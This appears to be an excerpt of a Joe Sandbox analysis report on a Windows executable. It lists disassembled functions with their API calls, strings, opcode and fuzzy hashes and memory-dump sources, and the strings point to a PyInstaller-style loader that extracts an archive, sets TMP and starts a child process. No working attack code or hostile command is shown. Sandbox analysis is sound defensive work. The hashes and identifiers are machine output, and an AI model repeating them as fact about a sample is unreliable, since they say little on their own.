                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                            • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                                                                            • Instruction ID: b1ffd64a29b30de40f11d6719f3241b881efdfef73416272129fd478e78c3d5b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5412B371E0C263E6FB24BA15E04467976ABFB40750F944136E79A87BC4DF7CE9908B08
                                                                                                                                                                                                                                                            Function 00007FF6404F02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                            • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                                                                            • Instruction ID: 82c57626d964c7d9075061fb34f581e1ae40eef3a7784c578c79fdee3959bacb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35128F62E0C163E6FB24BA54E0546BA729BFBD0754F884132E799C67C4DF7CE8908B50
                                                                                                                                                                                                                                                            Function 00007FF6404E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 9095cb27183a8615287c63e08b54de828af981adc91def897024e347138b7828
                                                                                                                                                                                                                                                            • Instruction ID: 9dfc91e0b643ff0b8b8168621ef1689b97bd1324d605cd508c8a7474870964f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9095cb27183a8615287c63e08b54de828af981adc91def897024e347138b7828
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA419231B4C663E2FA24FB12A9406BAA391FF89BC4F444431DE5D87BA5DE3CE5458380
                                                                                                                                                                                                                                                            Function 00007FF6404E7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                                                            • API String ID: 2895956056-699529898
                                                                                                                                                                                                                                                            • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                            • Instruction ID: 47de76dc5fa4126ef7c5004b4db62545672ab9370504d5136caecccf2e9b28ea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF41FB31A1CB9291EA20BB64E4952AEB2A5FB89364F500335E6AD877D9DF7CD0448B40
                                                                                                                                                                                                                                                            Function 00007FF6404EDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                            • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                                                                                            • Instruction ID: b7835b3a952e6b23f43904783f28ca2b998240ee58df873890d39408928fee2c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2ED14C32A0CB61DAEB20FB6594403AD77A0FB55798F104235EE8D97B96DF38E581C780
                                                                                                                                                                                                                                                            Function 00007FF6404FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE19C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE1A8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                            • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                            • Instruction ID: b6910443d84c49c151f59c00ef2200bc76ce80b2dbad949d85a3e33c553a0d70
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141E231B1DA22E1FA16FB17AA0467A229BFF45B90F084535DD1DC7784EE3CEA458300
                                                                                                                                                                                                                                                            Function 00007FF6404E7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7CE4
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7D2C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6404E365F), ref: 00007FF6404E7E47
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6404E7E69
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F7561
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                            • API String ID: 740614611-1339014028
                                                                                                                                                                                                                                                            • Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                                                                                                                                                                                                            • Instruction ID: 05379c9ae0fcb58b5ad99494fa2f29691be71f51bb853eeff872209563e4896b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00419121A0D662E0FA24FB619A55AFA2255EF957D4F405131EE1DC7796EE3CE5008380
                                                                                                                                                                                                                                                            Function 00007FF6404ECFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED06D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED07B
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED0A5
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED113
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED11F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                            • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                            • Instruction ID: 0a577c0a8e8f3bba22f2a6c7fa658903c5fe1a473d615a13009d932257db2ec8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B131C221A1EA62E1EE15FB12A9006797394FF49BA8F5E4635DD2D87380EF3CE4468340
                                                                                                                                                                                                                                                            Function 00007FF6404E7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                                            • Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                                                                            • Instruction ID: ac2e215d320ffff1b355f9a19b0d4e3315f0727fb6e3c8e833f686094dd3892a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0221A031A0CA5292EB20FB55E58462AB3A5EF917F4F200235EA7C83BE4DF7CD4858740
                                                                                                                                                                                                                                                            Function 00007FF6404FA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                                                                            • Instruction ID: 77a884a90357f97bee4cac1bb6da1c9681f41745507edee62d68497be7733232
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30219D24F4C662F2FA68B722564917D218BAF887B0F044734E83ECBBD6DE6CB4108701
                                                                                                                                                                                                                                                            Function 00007FF6404E29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                                                            • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                                                                            • Instruction ID: 254e0af54bfeede140830f3e6c79a011187cf6447a103088df4033657765c7e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B21517260CAA192F724FB10F5506DA7364FB89788F400136EADD93B98DF7CD5468B40
                                                                                                                                                                                                                                                            Function 00007FF64050707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                            • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction ID: eed7c7beb8184f8e67058d578fdfd354db35fab34eed7f0e391e23ce50bf447a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5118E31A1CA6696F754BB02E99472A66A0FB89BE8F040234EA2DC7794DF3CD814C740
                                                                                                                                                                                                                                                            Function 00007FF6404E81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E821D
                                                                                                                                                                                                                                                            • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E827A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8305
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8364
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8375
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E838A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3462794448-0
